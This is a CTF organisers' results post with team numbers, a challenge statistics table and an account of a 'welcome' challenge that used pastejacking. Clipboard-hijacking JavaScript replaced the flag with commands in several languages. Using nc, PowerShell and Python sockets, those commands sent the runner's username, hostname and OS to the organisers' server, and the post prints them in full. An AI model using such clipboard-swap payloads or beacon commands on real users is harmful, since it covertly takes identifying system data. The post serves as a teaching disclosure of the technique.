This year we had 759 registered teams, with 433 of them that solved at least one challenge during the 36 hours of the CTF.

Here are our Top 10 (top 6 teams will receive an invitation to the conference shortly):

Of course you’re welcome to the conference and/or CTF even if you haven’t made it into the top 6!

The full results are available on CTFtime.

Here are the challenge stats, with time to solve the challenges and number of solves :

Name Categories Points Time to solve First blood Number of solves
welcome warmup 37 00:00:44 hxp 427
VulnShop web 62 00:46:38 Eat Sleep Pwn Repeat 107
onecall pwn 87 00:57:34 Sec0d 63
Rule86 crypto 78 01:01:08 Dragon Sector 75
Hax4Bitcoins crypto, misc 137 01:08:40 CardiffComputingClub 34
Smart-Y web 80 01:15:56 jbz 72
File Vault web 201 01:50:38 LC↯BC 20
sapeloshop pwn, sape 163 03:20:17 p4team 27
MagicHat pwn, reverse 321 05:14:11 p4team 9
Cool Storage Service web 357 15:52:36 Dragon Sector 7
insocalc pwn 500 32:50:17 Dragon Sector 1
cong0miner pwn 500 0

 

This year we introduced a troll “welcome” challenge, which looked like this:

The service does indeed give the flag immediately, however there was a catch: some javascript code was executed in the background to hook the clipboard copy listener, a technique otherwise known as pastejacking. The following (harmless) commands were stored in the clipboard instead, which ultimately welcomes you to the “wall of shame”:

echo "$(whoami)@$(hostname)"|nc welcome.teaser.insomnihack.ch 42351
say you have been pwned
powershell -noprofile -command "$c=New-Object -TypeName System.Net.Sockets.TcpClient;$c.Connect('welcome.teaser.insomnihack.ch', 42351);$w=New-Object System.IO.StreamWriter($c.GetStream());$w.WriteLine(\"$(whoami)\")|Out-Null;$w.Close();$c.Close();"
exec("""from socket import *\nimport platform, getpass\ns=socket(AF_INET, SOCK_STREAM)\ns.connect(("welcome.teaser.insomnihack.ch",42351))\ns.sendall("{0}@{1}[{2}]".format(getpass.getuser(),platform.node(),platform.system()).encode("utf-8"))\ns.close()""")
clear||cls
nc welcome.teaser.insomnihack.ch 42513

There are several ways this could fail, but this still worked pretty well, as it got us the following results after removing abnormal behaviours :

  • 702 unique IPs
  • 141 root users (76 if we exclude kali machines)
  • 11 windows accounts with “admin” in the name (68 windows machines in total)

We didn’t check the privileges of other users, if they had sudoers etc.

Don’t worry, we are not going to release the teams/usernames/hostnames 😉

We look forward to seeing you at the CTF in Geneva!